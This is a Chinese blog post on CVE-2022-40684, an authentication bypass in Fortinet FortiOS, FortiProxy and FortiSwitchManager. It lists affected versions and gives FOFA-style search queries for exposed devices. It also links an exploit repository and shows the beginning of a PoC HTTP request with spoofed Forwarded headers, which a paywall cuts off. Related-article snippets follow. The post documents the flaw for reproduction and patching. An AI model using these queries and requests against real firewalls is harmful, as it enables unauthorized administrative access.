CVE-2022-40684 Fortinet(飞塔)身份验证绕过漏洞

原创 已于 2022-11-05 14:15:45 修改 · 7.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #CVE-2022-40684 #飞塔身份验证绕过漏洞

于 2022-10-31 14:27:20 首次发布
本文介绍了Fortinet(飞塔)产品的身份验证绕过漏洞。受影响产品包括FortiOS、FortiProxy和FortiSwitchManager,给出了影响版本。还提供搜索语法、Poc和Exp数据包,进行了漏洞复现,最后给出防护建议,如升级版本、设置WAF策略。

GitHub地址:

https://github.com/hughink/CVE-2022-40684

漏洞简介

Fortinet(飞塔)是一家全球知名的网络安全产品和安全解决方案提供商,其产品包括防火墙、防病毒软件、入侵防御系统和终端安全组件等。在受影响的FortiOS、FortiProxy 和 FortiSwitchManager产品的管理界面中,可以通过使用备用路径或通道绕过身份验证,并在未经认证的情况下通过特制的HTTP或HTTPS请求对管理界面进行操作。

影响版本

  • FortiOS 版本 7.2.0 - 7.2.1

  • FortiOS 版本 7.0.0 - 7.0.6

  • FortiProxy 版本 7.2.0

  • FortiProxy 版本 7.0.0 - 7.0.6

  • FortiSwitchManager 版本 7.2.0

  • FortiSwitchManager 版本 7.0.0

搜索语法

title="FortiProxy"

title="FortiGate"

Poc数据包

GET /api/v2/cmdb/system/admin HTTP/2Host: 35.192.137.121User-Agent: Node.jsAccept-Encoding: gzip, deflateAccept: */*Hosts: 127.0.0.1:9980Forwarded: by="[127.0.0.1]:80";for="[127.
最低0.47元/天 解锁文章
CVE-2022-40684 Fortinet多个产品身份验证绕过漏洞复现
热爱学习,喜欢折腾!
10-16 2039
Fortinet FortiOS是美国Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy 为网站和基于云的应用程序提供安全 Web 网关、安全功能、无与伦比的性能以及最佳用户体验。
CVE-2022-40684复现
G3et的博客
04-22 1023
admin 无密码直接回车(会提示修改密码)
网络靶场实战--(Fortinet)防火墙认证绕过漏洞(CVE-2022-40684)
蛇矛实验室
12-13 7432
我们这一小节简单了解了身份认证绕过流程,分析并复现了fortigate防火墙身份认证绕过漏洞的形成过程以及如何利用。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
(自用POC)Fortinet-CVE-2022-40684
qq_50854662的博客
03-13 2192
(自用POC)Fortinet-CVE-2022-40684
ms14-064漏洞防火墙实验
最新发布
byv525的博客
07-09 535
4.配置IPv4策略,将公网方向的port1设置为流出接口,将内网方向的port1设置为流入接口,源地址建议配置为主机ip,目标地址为all(可以访问各种网站),同时启用NAT将内网地址转化为外网地址。3.将port2的角色设置为局域网,同时设置IP为192.168.10.1,并开启dhcp服务为主机分配地址,并配置DNS服务器地址。2.防火墙获取到地址后,就可以通过网页访问防火墙的web页面,进入port1将端口角色设置为广域网,同时地址模式设置为DHCP。5.查看主机分配到的地址,与生成的路由。
复现防火墙漏洞CVE-2022-41328
zzqzzq11的博客
12-05 1422
​ Analysis of FG-IR-22-369 | Fortinet Blog
新增影响版本!Fortinet 更新CVE-2022-42475漏洞应对方案
Fortinet_CHINA的博客
12-15 1847
漏洞应对方案
Fortinet 防火墙受高危漏洞影响,可遭远程攻击
smellycat000的专栏
06-29 768
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士最近,Fortinet 修复了 FortiWeb web 应用程序防火墙 (WAF) 中的一个高危漏洞,它可被用于执行任意命令。如...
重生之我是赏金猎人-SRC漏洞挖掘(十二)-记一次对抗流量检测的文件上传
J0o1ey Blog
02-16 696
重生之我是赏金猎人-SRC漏洞挖掘(十二)-记一次对抗流量检测的文件上传 善用编码、宽字节,熟知每种开发语言的特性,是绕过WAF不可或缺的基本功特殊情况下,思路灵活可以出奇制胜~
Fortinet FortiOS 路径遍历漏洞(CVE-2018-13379)
mei_13的博客
07-08 4795
1 漏洞简介 早在2019年5月24日,官方就发布了CVE-2018-13379漏洞安全公告,但直到8月份才有漏洞Exp流出,导致漏洞蔓延。 据官方介绍,CVE-2018-13379是SSL VPN中的一个目录遍历漏洞,该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可利用该漏洞访问受限目录之外的文件。 受影响的版本: FortiOS/5.6.3 ~ 5.6.7、FortiOS/6.0.0 ~ 6.0.4 2 环境搭建 使用FOFA中搜索SSL VPN服务器,
【网络安全CVE 漏洞分析以及复现
heikeyouyou的博客
05-22 1425
记一次CVE 漏洞分析以及复现
关于Fortinet 错误缺陷
qq_24496111的博客
03-20 394
黑客以可能被恶意利用在远程命令执行的FortiNAC网络服务器未经认证的文件路径操作漏洞CVE-2022-39952为目标的Exploit,以暴露在互联网上的Fortinet为目标。尽管去年10月报道了漏洞CVE-2022-40684),但尽管公司敦促人们进行补丁,搜索CTI引擎CriminalIP仍然显示有7077个未补丁IP地址。而且,今年12月Fortinet在未公开一个月后报告的(CVE-2022-42475)中,未补丁的IP地址为7,080个,显示在搜索引擎上。
漏洞预警丨Fortinet FortiOS & FortiProxy越界写入漏洞CVE-2024-21762)
C20220511的博客
03-18 2107
Fortinet FortiOS是美国Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。在SSL VPN组件中存在越界写入漏洞,可能导致未经身份验证的远程威胁者通过特制HTTP请求执行任意命令或代码。daydaypoc漏洞平台于2024年3月12日已收录该漏洞。越界写入/远程命令执行。
FortiGate7.4.0 CVE-2024-23113漏洞复现与分析笔记
weixin_51339377的博客
12-02 3486
给予调试启发以及固件文件提取启发的参考地址。
最新系统漏洞--Fortinet FortiGate跨站脚本漏洞
weixin_48555088的博客
10-23 1437
最新系统漏洞2021年10月22日 受影响系统: Fortinet FortiGate <= 6.4.1 Fortinet FortiGate 6.2.2 <= Version <= 6.2.5 描述: CVE(CAN) ID: CVE-2020-15937 Fortinet FortiGate是美国Fortinet)公司的一套网络安全平台。该平台提供防火墙、防病毒和入侵防御(IPS)、应用控制、反垃圾邮件、无线控制器和广域网加速等功能。 FortiGate 6.2.2-6.2.5版
安全漏洞通告」Fortinet SSL VPN远程代码执行漏洞解决方案
bocco的博客
12-14 1877
安全狗应急响应中心监测到,Fortinet发布了FortiOS SSL-VPN的风险通告,漏洞等级:高危,漏洞评分:9.3。漏洞编号:CVE-2022-42475。
Fortinet FortiGate CRLF字符URL过滤绕过漏洞
瞎几把学
09-10 2531
发布时间:2008-1-16 15:15:03 文章作者:ADLab 文章来源:启明星辰   BUGTRAQ ID: 27276 CNCAN ID:CNCAN-2008011605 漏洞消息时间:2008-01-14 漏洞起因 设计错误 影响系统 Fortinet FortiGate-1000 3.00 不受影响系统 危害 远程
超过三分之二的 FortiGate 防火墙仍面临风险
weixin_56154577的博客
01-16 226
Bishop Fox 表示,需要注意的是,根据 Bishop Fox 的说法,之前仅基于 SSL 证书估计 250,000 个暴露的 FortiGate 防火墙的报告可能无法准确反映易受攻击设备的实际数量。为了准确识别易受攻击的设备,Gross说,一种更有效的方法包括搜索返回特定HTTP响应标头的服务器,然后根据重定向到特定路径的设备进一步过滤结果。“这 [...]研究结果强调,设备和嵌入式设备的风险与传统计算设备具有相同的安全风险,但升级的痛苦更大,“格罗斯补充说,在互联网连接设备的搜索引擎。
安全篇 / 入侵防御】(6.0) ❀ 02. 防范Log4j远程代码执行漏洞攻击 ❀ FortiGate 防火墙
防火墙技术专栏
12-15 2169
  【简介】近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 Log4j远程代码执行漏洞   Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。IT之家获悉,由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。  ..
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值